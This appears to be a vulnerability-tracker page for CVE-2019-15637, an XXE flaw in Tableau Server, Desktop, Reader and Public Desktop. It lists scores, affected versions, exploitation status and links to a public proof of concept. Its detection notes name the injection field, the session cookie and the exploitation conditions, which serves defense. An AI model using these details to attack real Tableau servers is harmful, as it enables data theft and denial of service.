CVE-2019-15637
published 2019-08-26CVE-2019-15637: Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects…
PriorityP276high8.1CVSS 3.1
AVNACLPRLUINSUCHINAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
14.31%
96.2th percentile
Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tableau | tableau_desktop | 10.2 – 10.2.23 | — |
| tableau | tableau_desktop | 10.3 – 10.3.23 | — |
| tableau | tableau_desktop | 10.4 – 10.4.19 | — |
| tableau | tableau_desktop | 10.5 – 10.5.18 | — |
| tableau | tableau_desktop | 2018.1 – 2018.1.15 | — |
| tableau | tableau_desktop | 2018.2 – 2018.2.12 | — |
| tableau | tableau_desktop | 2018.3 – 2018.3.9 | — |
| tableau | tableau_desktop | 2019.1 – 2019.1.6 | — |
| tableau | tableau_desktop | 2019.2 – 2019.2.2 | — |
| tableau | tableau_public_desktop | 10.2 – 10.2.2 | — |
| tableau | tableau_reader | 10.2 – 10.2.2 | — |
| tableau | tableau_server | 10.2 – 10.2.23 | — |
| tableau | tableau_server | 10.3 – 10.3.23 | — |
| tableau | tableau_server | 10.4 – 10.4.19 | — |
| tableau | tableau_server | 10.5 – 10.5.18 | — |
| tableau | tableau_server | 2018.1 – 2018.1.15 | — |
| tableau | tableau_server | 2018.2 – 2018.12 | — |
| tableau | tableau_server | 2018.3 – 2018.3.9 | — |
| tableau | tableau_server | 2019.1 – 2019.1.6 | — |
| tableau | tableau_server | 2019.2 – 2019.2.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor multipart/form-data POST requests to Tableau Server endpoints that include an 'extensionManifestContents' field, as this is the injection point for the malicious XXE payload. ↗
- →Alert on Tableau Server requests carrying the 'workgroup_session_id' cookie combined with multipart form submissions containing XML content in the extensionManifestContents field, which is the exploitation pattern for this XXE. ↗
- →Malicious workbooks, data sources, and extension files published or used on Tableau Server can trigger this XXE vulnerability — inspect uploaded .twb, .tds, and extension manifest files for external entity declarations. ↗
- ·Exploitation requires an authenticated session (valid workgroup_session_id cookie) and knowledge of target-specific parameters (zoneId and dashboard name), limiting unauthenticated exploitation but not authenticated low-privilege users. ↗
- ·The exploit author notes the PoC is incomplete due to lack of source code access; a more complete exploit may exist at the referenced GitHub repository. ↗
- ·The vulnerability affects multiple Tableau products: Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop — detection and patching scope must cover all four. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
nvdv3.07.1HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:L
nvdv2.05.5MEDIUMAV:N/AC:L/Au:S/C:P/I:N/A:P
vulncheck8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rmvg-87v4-qjvv: Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS
ghsa_unreviewed·2022-05-24
CVE-2019-15637 [HIGH] CWE-611 GHSA-rmvg-87v4-qjvv: Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS
Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop.
VulnCheck
tableau tableau_server Improper Restriction of XML External Entity Reference
vulncheck·2019·CVSS 8.1
CVE-2019-15637 [HIGH] tableau tableau_server Improper Restriction of XML External Entity Reference
tableau tableau_server Improper Restriction of XML External Entity Reference
Numerous Tableau products are vulnerable to XXE via a malicious workbook, extension, or data source, leading to information disclosure or a DoS. This affects Tableau Server, Tableau Desktop, Tableau Reader, and Tableau Public Desktop.
Affected: tableau tableau_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/2024-07/aa24-207a-dprk-cyber-group-conducts-global-espionage-campaign.pdf
No detection rules found.
No writeups or analysis indexed.
https://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-productshttps://github.com/minecrater/exploits/blob/master/TableauXXE.pyhttps://packetstormsecurity.com/files/154232/Tableau-XML-Injection.htmlhttps://community.tableau.com/community/security-bulletins/blog/2019/08/22/important-adv-2019-030-xxe-vulnerability-in-tableau-productshttps://github.com/minecrater/exploits/blob/master/TableauXXE.pyhttps://packetstormsecurity.com/files/154232/Tableau-XML-Injection.html
2019-08-26
Published
Exploited in the wild